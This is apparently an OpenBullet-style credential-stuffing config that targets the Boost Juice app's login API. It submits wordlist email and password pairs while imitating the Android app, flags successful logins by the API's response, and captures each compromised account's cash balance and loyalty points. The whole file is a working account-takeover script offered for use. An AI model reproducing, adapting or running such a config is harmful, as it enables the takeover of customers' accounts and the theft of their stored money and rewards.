[SETTINGS]
{
  "Name": "Boost Juice",
  "SuggestedBots": 1,
  "LastModified": "2019-04-05T19:03:20.8620949+01:00",
  "AdditionalInfo": "",
  "Author": "Spaceman",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://boostjuice-app.herokuapp.com/api/vibe/user.php?v=209&user=android" 
  CONTENT "email=<USER>&pass=<PASS>&uuid=708bcda84f7a1558_gf2crmygr&model=SM-G950W&platform=Android&version=5.1.1&complie=android" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "X-Requested-With: com.redcat.BoostApp" 
KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Success\":0" 
  KEYCHAIN Success OR 
    KEY "Success\":1,\"AuthToken" 
PARSE "<SOURCE>" LR "Money\":" ",\"DateOfBirth" -> CAP "Cash : " "$" "" 
PARSE "<SOURCE>" LR "Points\":" ",\"Money\":" -> CAP "Points : " 
